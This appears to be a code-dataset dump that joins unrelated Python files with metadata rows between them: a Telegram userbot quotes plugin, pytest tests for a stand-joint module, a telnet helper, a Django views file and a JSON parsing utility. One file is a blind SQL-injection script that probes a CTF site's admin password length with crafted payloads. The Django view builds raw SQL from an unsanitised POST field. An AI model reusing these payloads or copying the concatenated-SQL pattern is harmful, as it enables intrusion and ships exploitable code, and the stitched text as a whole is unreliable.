"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
eviralOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"Howdy, howdy ,howdy!",
"hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"hello, sunshine!",
"`Hey, howdy, hi!`",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"`Hey there, freshman!`",
"`I come in peace!`",
"`I come for peace!`",
"Ahoy, matey!",
"`Hi !`",
]
CONGRATULATION = [
"`Congratulations and BRAVO!`",
"`You did it! So proud of you!`",
"`This calls for celebrating! Congratulations!`",
"`I knew it was only a matter of time. Well done!`",
"`Congratulations on your well-deserved success.`",
"`Heartfelt congratulations to you.`",
"`Warmest congratulations on your achievement.`",
"`Congratulations and best wishes for your next adventure!”`",
"`So pleased to see you accomplishing great things.`",
"`Feeling so much joy for you today. What an impressive achievement!`",
]
BYESTR = [
"`Nice talking with you`",
"`I've gotta go!`",
"`I've gotta run!`",
"`I've gotta split`",
"`I'm off!`",
"`Great to see you,bye`",
"`See you soon`",
"`Farewell!`",
]
GDNIGHT = [
"`Good night keep your dreams alive`",
"`Night, night, to a dear friend! May you sleep well!`",
"`May the night fill with stars for you. May counting every one, give you contentment!`",
"`Wishing you comfort, happiness, and a good night’s sleep!`",
"`Now relax. The day is over. You did your best. And tomorrow you’ll do better. Good Night!`",
"`Good night to a friend who is the best! Get your forty winks!`",
"`May your pillow be soft, and your rest be long! Good night, friend!`",
"`Let there be no troubles, dear friend! Have a Good Night!`",
"`Rest soundly tonight, friend!`",
"`Have the best night’s sleep, friend! Sleep well!`",
"`Have a very, good night, friend! You are wonderful!`",
"`Relaxation is in order for you! Good night, friend!`",
"`Good night. May you have sweet dreams tonight.`",
"`Sleep well, dear friend and have sweet dreams.`",
"`As we wait for a brand new day, good night and have beautiful dreams.`",
"`Dear friend, I wish you a night of peace and bliss. Good night.`",
"`Darkness cannot last forever. Keep the hope alive. Good night.`",
"`By hook or crook you shall have sweet dreams tonight. Have a good night, buddy!`",
"`Good night, my friend. I pray that the good Lord watches over you as you sleep. Sweet dreams.`",
"`Good night, friend! May you be filled with tranquility!`",
"`Wishing you a calm night, friend! I hope it is good!`",
"`Wishing you a night where you can recharge for tomorrow!`",
"`Slumber tonight, good friend, and feel well rested, tomorrow!`",
"`Wishing my good friend relief from a hard day’s work! Good Night!`",
"`Good night, friend! May you have silence for sleep!`",
"`Sleep tonight, friend and be well! Know that you have done your very best today, and that you will do your very best, tomorrow!`",
"`Friend, you do not hesitate to get things done! Take tonight to relax and do more, tomorrow!`",
"`Friend, I want to remind you that your strong mind has brought you peace, before. May it do that again, tonight! May you hold acknowledgment of this with you!`",
"`Wishing you a calm, night, friend! Hoping everything winds down to your liking and that the following day meets your standards!`",
"`May the darkness of the night cloak you in a sleep that is sound and good! Dear friend, may this feeling carry you through the next day!`",
"`Friend, may the quietude you experience tonight move you to have many more nights like it! May you find your peace and hold on to it!`",
"`May there be no activity for you tonight, friend! May the rest that you have coming to you arrive swiftly! May the activity that you do tomorrow match your pace and be all of your own making!`",
"`When the day is done, friend, may you know that you have done well! When you sleep tonight, friend, may you view all the you hope for, tomorrow!`",
"`When everything is brought to a standstill, friend, I hope that your thoughts are good, as you drift to sleep! May those thoughts remain with you, during all of your days!`",
"`Every day, you encourage me to do new things, friend! May tonight’s rest bring a new day that overflows with courage and exciting events!`",
]
GDMORNING = [
"`Life is full of uncertainties. But there will always be a sunrise after every sunset. Good morning!`",
"`It doesn’t matter how bad was your yesterday. Today, you are going to make it a good one. Wishing you a good morning!`",
"`If you want to gain health and beauty, you should wake up early. Good morning!`",
"`May this morning offer you new hope for life! May you be happy and enjoy every moment of it. Good morning!`",
"`May the sun shower you with blessings and prosperity in the days ahead. Good morning!`",
"`Every sunrise marks the rise of life over death, hope over despair and happiness over suffering. Wishing you a very enjoyable morning today!`",
"`Wake up and make yourself a part of this beautiful morning. A beautiful world is waiting outside your door. Have an enjoyable time!`",
"`Welcome this beautiful morning with a smile on your face. I hope you’ll have a great day today. Wishing you a very good morning!`",
"`You have been blessed with yet another day. What a wonderful way of welcoming the blessing with such a beautiful morning! Good morning to you!`",
"`Waking up in such a beautiful morning is a guaranty for a day that’s beyond amazing. I hope you’ll make the best of it. Good morning!`",
"`Nothing is more refreshing than a beautiful morning that calms your mind and gives you reasons to smile. Good morning! Wishing you a great day.`",
"`Another day has just started. Welcome the blessings of this beautiful morning. Rise and shine like you always do. Wishing you a wonderful morning!`",
"`Wake up like the sun every morning and light up the world your awesomeness. You have so many great things to achieve today. Good morning!`",
"`A new day has come with so many new opportunities for you. Grab them all and make the best out of your day. Here’s me wishing you a good morning!`",
"`The darkness of night has ended. A new sun is up there to guide you towards a life so bright and blissful. Good morning dear!`",
"`Wake up, have your cup of morning tea and let the morning wind freshen you up like a happiness pill. Wishing you a good morning and a good day ahead!`",
"`Sunrises are the best; enjoy a cup of coffee or tea with yourself because this day is yours, good morning! Have a wonderful day ahead.`",
"`A bad day will always have a good morning, hope all your worries are gone and everything you wish could find a place. Good morning!`",
"`A great end may not be decided but a good creative beginning can be planned and achieved. Good morning, have a productive day!`",
"`Having a sweet morning, a cup of coffee, a day with your loved ones is what sets your “Good Morning” have a nice day!`",
"`Anything can go wrong in the day but the morning has to be beautiful, so I am making sure your morning starts beautiful. Good morning!`",
"`Open your eyes with a smile, pray and thank god that you are waking up to a new beginning. Good morning!`",
"`Morning is not only sunrise but A Beautiful Miracle of God that defeats the darkness and spread light. Good Morning.`",
"`Life never gives you a second chance. So, enjoy every bit of it. Why not start with this beautiful morning. Good Morning!`",
"`If you want to gain health and beauty, you should wake up early. Good Morning!`",
"`Birds are singing sweet melodies and a gentle breeze is blowing through the trees, what a perfect morning to wake you up. Good morning!`",
"`This morning is so relaxing and beautiful that I really don’t want you to miss it in any way. So, wake up dear friend. A hearty good morning to you!`",
"`Mornings come with a blank canvas. Paint it as you like and call it a day. Wake up now and start creating your perfect day. Good morning!`",
"`Every morning brings you new hopes and new opportunities. Don’t miss any one of them while you’re sleeping. Good morning!`",
"`Start your day with solid determination and great attitude. You’re going to have a good day today. Good morning my friend!`",
"`Friendship is what makes life worth living. I want to thank you for being such a special friend of mine. Good morning to you!`",
"`A friend like you is pretty hard to come by in life. I must consider myself lucky enough to have you. Good morning. Wish you an amazing day ahead!`",
"`The more you count yourself as blessed, the more blessed you will be. Thank God for this beautiful morning and let friendship and love prevail this morning.`",
"`Wake up and sip a cup of loving friendship. Eat your heart out from a plate of hope. To top it up, a fork full of kindness and love. Enough for a happy good morning!`",
"`It is easy to imagine the world coming to an end. But it is difficult to imagine spending a day without my friends. Good morning.`",
]
@bot.on(admin_cmd(pattern=f"love$", outgoing=True))
@bot.on(sudo_cmd(pattern='love$', allow_sudo=True))
async def love(e):
txt = random.choice(LOVESTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"dhoka$", outgoing=True))
@bot.on(sudo_cmd(pattern='dhoka$', allow_sudo=True))
async def katgya(e):
txt = random.choice(DHOKA)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"metoo$", outgoing=True))
@bot.on(sudo_cmd(pattern='metoo$', allow_sudo=True))
async def metoo(e):
txt = random.choice(METOOSTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdnoon$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdnoon$', allow_sudo=True))
async def noon(e):
txt = random.choice(GDNOON)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"chase$", outgoing=True))
@bot.on(sudo_cmd(pattern='chase$', allow_sudo=True))
async def police(e):
txt = random.choice(CHASE_STR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"congo$", outgoing=True))
@bot.on(sudo_cmd(pattern='congo$', allow_sudo=True))
async def Sahih(e):
txt = random.choice(CONGRATULATION)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"qhi$", outgoing=True))
@bot.on(sudo_cmd(pattern='qhi$', allow_sudo=True))
async def hoi(e):
txt = random.choice(eviralOSTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdbye$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdbye$', allow_sudo=True))
async def bhago(e):
txt = random.choice(BYESTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdnyt$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdnyt$', allow_sudo=True))
async def night(e):
txt = random.choice(GDNIGHT)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdmng$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdmng$', allow_sudo=True))
async def morning(e):
txt = random.choice(GDMORNING)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern="quote ?(.*)", outgoing=True))
@bot.on(sudo_cmd(pattern="quote ?(.*)", allow_sudo=True))
async def quote_search(event):
if event.fwd_from:
return
catevent = await edit_or_reply(event, "`Processing...`")
input_str = event.pattern_match.group(1)
if not input_str:
api_url = "https://quotes.cwprojects.live/random"
try:
response = requests.get(api_url).json()
except:
response = None
else:
api_url = f"https://quotes.cwprojects.live/search/query={input_str}"
try:
response = random.choice(requests.get(api_url).json())
except:
response = None
if response is not None:
await catevent.edit(f"`{response['text']}`")
else:
await edit_or_reply(catevent, "`Sorry Zero results found`", 5)
CmdHelp("quotes").add_command(
"quote", None, "Sends a random mind-blowing quote"
).add_command("gdmng", None, "Sends a random Good Morning Quote").add_command(
"gdnyt", None, "Sends a random Good Night Quote"
).add_command(
"gdbye", None, "Sends a random Good Byee Quote"
).add_command(
"qhi", None, "Sends a random hello msg"
).add_command(
"congo", None, "Sends a random congratulations quote"
).add_command(
"chase", None, "Sends a random Chase quote"
).add_command(
"gdnoon", None, "Sends a random Good Afternoon quote"
).add_command(
"metoo", None, 'Sends a text saying "Mee too"'
).add_command(
"dhoka", None, "Sends a random Dhoka quote(katt gya bc)"
).add_command(
"love", None, "Sends a random love quote🥰. (A stage before .dhoka)"
).add()
| 65.609572 | 214 | 0.702231 | 4,434 | 26,047 | 4.106676 | 0.215381 | 0.019935 | 0.009061 | 0.010544 | 0.130814 | 0.093415 | 0.087429 | 0.063101 | 0.058817 | 0.058817 | 0 | 0.000387 | 0.206934 | 26,047 | 396 | 215 | 65.775253 | 0.881009 | 0 | 0 | 0.078431 | 0 | 0.184874 | 0.803547 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.011204 | 0 | 0.014006 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4b59ea674aa8a31f87633b437e5863be80f3ef3 | 4,089 | py | Python | tests/test_joints.py | slaclab/pystand | c0037d4af52cff98c7e758a7a0ff08156ade4646 | [
"BSD-3-Clause-LBNL"
] | null | null | null | tests/test_joints.py | slaclab/pystand | c0037d4af52cff98c7e758a7a0ff08156ade4646 | [
"BSD-3-Clause-LBNL"
] | null | null | null | tests/test_joints.py | slaclab/pystand | c0037d4af52cff98c7e758a7a0ff08156ade4646 | [
"BSD-3-Clause-LBNL"
] | 2 | 2018-05-30T19:02:58.000Z | 2020-12-13T00:35:01.000Z | ############
# Standard #
############
import math
###############
# Third Party #
###############
import ophyd
import pytest
##########
# Module #
##########
from detrot import ConeJoint, AngledJoint, StandPoint, Point
from conftest import PseudoMotor
@pytest.fixture(scope='function')
def pseudo_cone():
angled = ConeJoint(slide = PseudoMotor(5),
lift = PseudoMotor(10),
offset = Point(1,2,3))
return angled
@pytest.fixture(scope='function')
def pseudo_angle():
angled = AngledJoint(slide = PseudoMotor(5),
lift = PseudoMotor(10),
offset = Point(1,2,3))
return angled
def test_cone_joint(pseudo_cone):
#Test Vertical
pseudo_cone.alpha = math.pi/2.
assert pytest.approx(pseudo_cone.joint.x) == 5
assert pytest.approx(pseudo_cone.joint.y) == 10
#Test Horizontal
pseudo_cone.alpha= 0
assert pseudo_cone.joint.x == 15
assert pseudo_cone.joint.y == 0
def test_cone_invert(pseudo_cone):
#Test 45
pseudo_cone.alpha = math.pi/4.
assert pseudo_cone.invert((13.07,9.07))[0] == pytest.approx(5,0.1)
assert pseudo_cone.invert((13.07,9.07))[1] == pytest.approx(10,0.1)
def test_angle_joint(pseudo_angle):
#Test Vertical
pseudo_angle.alpha = math.pi/2.
assert pytest.approx(pseudo_angle.joint.x) == 5
assert pytest.approx(pseudo_angle.joint.y) == 10
assert pytest.approx(pseudo_angle.joint.z) == 0
#Test Horizontal
pseudo_angle.alpha = 0
assert pytest.approx(pseudo_angle.joint.x) == 5
assert pytest.approx(pseudo_angle.joint.y) == 0
assert pytest.approx(pseudo_angle.joint.z) == 10
#Test no-slide
pseudo_angle.slide = None
assert pytest.approx(pseudo_angle.joint.x) == 0
assert pytest.approx(pseudo_angle.joint.y) == 0
assert pytest.approx(pseudo_angle.joint.z) == 10
def test_angle_invert(pseudo_angle):
#Test Vertical
pseudo_angle.alpha = math.pi/2.
assert pseudo_angle.invert((6,12))[0] == pytest.approx(5,0.1)
assert pseudo_angle.invert((6,12))[1] == pytest.approx(10,0.1)
#Test no-slide
pseudo_angle.slide = None
assert pseudo_angle.invert((6,12)) == pytest.approx(10,0.1)
def test_position(pseudo_cone):
pseudo_cone.alpha= 0
assert pseudo_cone.position == (16, 2, 3)
pseudo_cone.alpha = math.pi/2.
assert pseudo_cone.position.x == pytest.approx(6,0.1)
assert pseudo_cone.position.y == 12
assert pseudo_cone.position.z == 3
def test_displacement(pseudo_angle):
assert pseudo_angle.displacement == (5,10)
pseudo_angle.slide = None
assert pseudo_angle.displacement == 10
def test_set_joint(pseudo_angle):
#Vertical
pseudo_angle.alpha = math.pi/2.
pseudo_angle.set_joint((6,12))
assert pseudo_angle.displacement[0] == pytest.approx(5,0.1)
assert pseudo_angle.displacement[1] == pytest.approx(10,0.1)
#Test no-slide
pseudo_angle.slide = None
pseudo_angle.set_joint((6,12))
assert pseudo_angle.displacement == pytest.approx(10,0.1)
def test_model(pseudo_angle, pseudo_cone):
model = AngledJoint.model(pseudo_angle)
assert isinstance(model.slide, ophyd.SoftPositioner)
assert isinstance(model.lift, ophyd.SoftPositioner)
assert model.displacement == pseudo_angle.displacement
#Test no slide
pseudo_angle.slide = None
model = AngledJoint.model(pseudo_angle)
assert model.slide == None
assert isinstance(model.lift, ophyd.SoftPositioner)
assert model.displacement == pseudo_angle.displacement
#Test cone
model = ConeJoint.model(pseudo_cone)
assert isinstance(model.slide, ophyd.SoftPositioner)
assert isinstance(model.lift, ophyd.SoftPositioner)
assert model.displacement == pseudo_cone.displacement
def test_stop(pseudo_cone):
pseudo_cone.stop()
pseudo_cone.slide.stop_call.method.assert_called_with()
pseudo_cone.lift.stop_call.method.assert_called_with()
def test_cmp():
p1 = PseudoMotor(5)
p2 = PseudoMotor(10)
assert AngledJoint(p1,p2) == AngledJoint(p1, p2)
| 30.288889 | 71 | 0.682563 | 560 | 4,089 | 4.828571 | 0.126786 | 0.154586 | 0.073225 | 0.097633 | 0.706361 | 0.691938 | 0.596524 | 0.45821 | 0.401627 | 0.377219 | 0 | 0.038692 | 0.184642 | 4,089 | 134 | 72 | 30.514925 | 0.772346 | 0.043042 | 0 | 0.420455 | 0 | 0 | 0.004191 | 0 | 0 | 0 | 0 | 0 | 0.443182 | 1 | 0.136364 | false | 0 | 0.056818 | 0 | 0.215909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4c0c23efe0af691e686cdc320886e050cb8e361 | 636 | py | Python | 0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | d8ea08bc02003af3722e0553060ed370ed395b33 | [
"MIT"
] | null | null | null | 0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | d8ea08bc02003af3722e0553060ed370ed395b33 | [
"MIT"
] | null | null | null | 0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | d8ea08bc02003af3722e0553060ed370ed395b33 | [
"MIT"
] | null | null | null | import urllib
import urllib2
url = "http://ctfq.sweetduet.info:10080/~q6/"
def main():
for i in range(1, 100):
data = {
"id": "admin' AND (SELECT LENGTH(pass) FROM user WHERE id = 'admin') = {counter} --".format(counter=i),
"pass": "",
}
print (data)
data1 = urllib.urlencode(data).encode("utf-8")
req = urllib2.Request(url, data1)
res = urllib2.urlopen(req)
print (res)
if int(res.headers["content-length"]) > 2000:
print("Do dai cua password: {counter}".format(counter=i))
break
if __name__ == "__main__":
main() | 30.285714 | 115 | 0.550314 | 77 | 636 | 4.441558 | 0.662338 | 0.040936 | 0.116959 | 0.122807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044248 | 0.289308 | 636 | 21 | 116 | 30.285714 | 0.712389 | 0 | 0 | 0 | 0 | 0.052632 | 0.276295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.157895 | 0.105263 | 0 | 0.157895 | 0.157895 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4c4d67f988add89a513610e9e3367a81daf5283 | 593 | py | Python | code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 74c56be74f2c9b15a4c9b523a1622453ae2064af | [
"MIT"
] | 18 | 2017-02-19T15:58:54.000Z | 2022-02-13T22:15:19.000Z | code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 74c56be74f2c9b15a4c9b523a1622453ae2064af | [
"MIT"
] | 1 | 2020-02-24T23:14:15.000Z | 2020-02-24T23:14:15.000Z | code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 74c56be74f2c9b15a4c9b523a1622453ae2064af | [
"MIT"
] | 27 | 2017-05-03T15:38:41.000Z | 2022-02-08T02:53:38.000Z | import telnetlib
import time
def send_command_telnetlib(ipaddress, username, password, enable_pass, command):
t = telnetlib.Telnet("192.168.100.1")
t.read_until(b"Username:")
t.write(username.encode("ascii") + b"\n")
t.read_until(b"Password:")
t.write(password.encode("ascii") + b"\n")
t.write(b"enable\n")
t.read_until(b"Password:")
t.write(enable_pass.encode("ascii") + b"\n")
t.read_until(b"#")
t.write(b"terminal length 0\n")
t.write(command + b"\n")
time.sleep(1)
result = t.read_until(b"#").decode("utf-8")
return result
| 21.178571 | 80 | 0.63575 | 92 | 593 | 4 | 0.358696 | 0.097826 | 0.13587 | 0.149457 | 0.277174 | 0.23913 | 0.23913 | 0.23913 | 0 | 0 | 0 | 0.026639 | 0.177066 | 593 | 27 | 81 | 21.962963 | 0.727459 | 0 | 0 | 0.117647 | 0 | 0 | 0.164129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.294118 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4c7aa58a5a7074c7dc6f26bfd9244c8183f237e | 7,909 | py | Python | pages/views.py | SmartDataWithR/CovidHelper | 21f8c3f3d81da0b5ec32b228c711e96f9d5c168e | [
"MIT"
] | null | null | null | pages/views.py | SmartDataWithR/CovidHelper | 21f8c3f3d81da0b5ec32b228c711e96f9d5c168e | [
"MIT"
] | 9 | 2020-03-27T10:33:35.000Z | 2022-03-12T00:20:47.000Z | pages/views.py | SmartDataWithR/CovidHelper | 21f8c3f3d81da0b5ec32b228c711e96f9d5c168e | [
"MIT"
] | null | null | null | from django.views.generic import TemplateView
from ipware import get_client_ip
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.conf import settings
from .forms import SearchForm
from users.models import CustomUser
import geopy
from geopy.distance import geodesic
import pandas as pd
import json
from django.utils.translation import gettext as _, activate
# required for IP to numeric
import socket
import struct
# import file for ip's to language mapping
df_ip_lang = pd.read_csv('pages/lng_map.csv', names=['ip_from', 'ip_to', 'country_code', 'country_name', 'lang_code'] )
def ip(request):
ip, is_routable = get_client_ip(request)
if ip is None:
ip = "0.0.0.0"
else:
if is_routable:
ipv = "Public"
else:
ipv = "Private"
return (ip, ipv)
def ip2int(addr):
return struct.unpack("!I", socket.inet_aton(addr))[0]
def index(request):
search = request.POST.get('search-field')
searchCat = request.POST.get('search-catogery')
locator = geopy.Nominatim(user_agent="myGeocoder")
gotodiv = False
# From IP to Language
#--------------------
request_ip = ip(request) # get request IP
request_ip_int = ip2int(request_ip[0]) # convert IP to numeric
df_filt = df_ip_lang[df_ip_lang.ip_from <= request_ip_int] # filter data for fetched ip
range_to_check = df_filt.iloc[-1]
is_in_range = request_ip_int > range_to_check.ip_from & request_ip_int < range_to_check.ip_to # check that my IP is in range
country_code = 'en-us' # initialise default language
if is_in_range: # if an entry is found in dataframe, set this one to country-code
country_code = range_to_check.lang_code
activate(country_code) # activate the current language code
current_path = str(request.get_full_path()).strip('/')
print(current_path)
# if user selected a language manually, use this one
if current_path == 'en':
activate('en-us')
elif current_path != '':
activate(current_path)
context = {}
if search != None:
location = locator.geocode(search, timeout=5)
if not hasattr(location, 'longitude'):
location = locator.geocode('Hamburg', timeout=5)
# get result for 'All' (Category 4)
if searchCat == '4':
sql_q = 'SELECT * FROM users_customuser'
else:
sql_q = 'SELECT * FROM users_customuser WHERE group_membership like ' + searchCat
print(sql_q)
#query = 'SELECT * FROM users_customuser'
#if search != None and searchCat == '4':
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser') )
#query = 'SELECT * FROM users_customuser'
#else:
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership = searchCat') )
#query = 'SELECT * FROM users_customuser WHERE group_membership = '.searchCat
# df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s<>'' AND group_membership IN('0','1','3')) OR (%s<>'' AND group_membership=group_membership))', [searchCat]) )
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s <> NULL AND group_membership IN('0','1','3')) OR (group_membership = group_membership))', [searchCat]) )
df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url, u.shop_type] for u in CustomUser.objects.raw(sql_q) )
df.columns = ['id','group_membership', 'longitude', 'latitude', 'slogan', 'zip_code', 'description', 'map_show_location', 'username', 'help_type', 'userImg_Url', 'shop_type']
df['distance'] = [geodesic((location.longitude, location.latitude), (x, y)).miles for x,y in zip(df['longitude'], df['latitude'])]
# filter for distance max 20km (12.4miles)
df_filt = df[df['distance'] < 12.4]
print(df_filt)
# pass the data to the template
group_membership = df_filt['group_membership'].values.tolist()
group_membership = [int(x) for x in group_membership]
help_type = df_filt['help_type'].values.tolist()
userImg_Url = df_filt['userImg_Url'].values.tolist()
slogan = df_filt['slogan'].values.tolist()
shop_type = df_filt['shop_type'].values.tolist()
description = df_filt['description'].values.tolist()
username = df_filt['username'].values.tolist()
zipcode = df_filt['zip_code'].values.tolist()
#tel_private = df_filt['tel_private'].values.tolist()
#tel_mobile = df_filt['tel_mobile'].values.tolist()
longitudes = df_filt['longitude'].values.tolist()
latitudes = df_filt['latitude'].values.tolist()
ids = df_filt['id'].values.tolist()
map_show_location = df_filt['map_show_location'].values.tolist()
map_show_location = [int(x) for x in map_show_location]
rname = list(range(0, len(ids)))
template_table = list(zip(rname, ids, slogan, description, zipcode))
gotodiv = 'search'
context = {'longitude': location.longitude, 'latitude': location.latitude,'id':ids, 'userImg_Url':userImg_Url, 'group_membership': group_membership, 'longitudes': longitudes, 'latitudes': latitudes, 'slogan': slogan, 'description': description, 'gotodiv': gotodiv, 'map_show_location':map_show_location, 'template_table':template_table, 'username':username, 'help_type':help_type}
return render(request, 'pages/home.html', context)
class HomePageView(TemplateView):
template_name = 'pages/home.html'
class AboutPageView(TemplateView):
template_name = 'pages/about.html'
def searchLocation(request):
form = SearchForm(request)
print(form)
if request.method=='POST':
form = SearchForm(request.POST)
return render(request, 'pages/home.html', {'form': form})
def change_password(request):
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user) # Important!
messages.success(request, 'Your password was successfully updated!')
return redirect('change_password')
else:
messages.error(request, 'Please correct the error below.')
else:
form = PasswordChangeForm(request.user)
return render(request, 'account/password_set.html', {
'form': form
})
def privacy(request):
return render(request, 'pages/privacy.html')
def imprint(request):
return render(request, 'pages/imprint.html')
def terms(request):
return render(request, 'pages/terms_conditions.html')
def cookie_policy(request):
return render(request, 'pages/cookie_policy.html')
| 48.820988 | 449 | 0.677709 | 1,050 | 7,909 | 4.922857 | 0.207619 | 0.072548 | 0.034823 | 0.043529 | 0.330238 | 0.264655 | 0.245889 | 0.221319 | 0.204101 | 0.204101 | 0 | 0.004578 | 0.19914 | 7,909 | 161 | 450 | 49.124224 | 0.811494 | 0.268808 | 0 | 0.060345 | 0 | 0 | 0.159513 | 0.013206 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077586 | false | 0.060345 | 0.137931 | 0.043103 | 0.336207 | 0.051724 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4d236eae71088db952059a4c21b0e805b6bad1c | 2,228 | py | Python | components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 2 | 2019-06-10T15:30:51.000Z | 2020-01-18T23:24:13.000Z | components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | null | null | null | components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 1 | 2022-03-31T09:52:46.000Z | 2022-03-31T09:52:46.000Z | """
TODO
"""
from collections import Counter
import simplejson
import yaml
import flask
from sheepdog.errors import (
UserError,
)
def oph_raise_for_duplicates(object_pairs):
"""
Given an list of ordered pairs, contstruct a dict as with the normal JSON
``object_pairs_hook``, but raise an exception if there are duplicate keys
with a message describing all violations.
"""
counter = Counter(p[0] for p in object_pairs)
duplicates = [p for p in counter.iteritems() if p[1] > 1]
if duplicates:
raise ValueError(
'The document contains duplicate keys: {}'
.format(','.join(d[0] for d in duplicates))
)
return {pair[0]: pair[1] for pair in object_pairs}
def parse_json(raw):
"""
Return a python representation of a JSON document.
Args:
raw (str): string of raw JSON content
Raises:
UserError: if any exception is raised parsing the JSON body
.. note:: Uses :func:`oph_raise_for_duplicates` in parser.
"""
try:
return simplejson.loads(
raw, object_pairs_hook=oph_raise_for_duplicates
)
except Exception as e:
raise UserError('Unable to parse json: {}'.format(e))
def parse_request_json(expected_types=(dict, list)):
"""
Return a python representation of a JSON POST body.
Args:
raw (str): string of raw JSON content
Return:
TODO
Raises:
UserError: if any exception is raised parsing the JSON body
UserError: if the result is not of the expected type
If raw is not provided, pull the body from global request object.
"""
parsed = parse_json(flask.request.get_data())
if not isinstance(parsed, expected_types):
raise UserError('JSON parsed from request is an invalid type: {}'
.format(parsed.__class__.__name__))
return parsed
def parse_request_yaml():
"""
Return a python representation of a YAML POST body. Raise UserError if any
exception is raised parsing the YAML body.
"""
try:
return yaml.safe_load(flask.request.get_data())
except Exception as e:
raise UserError('Unable to parse yaml: {}'.format(e))
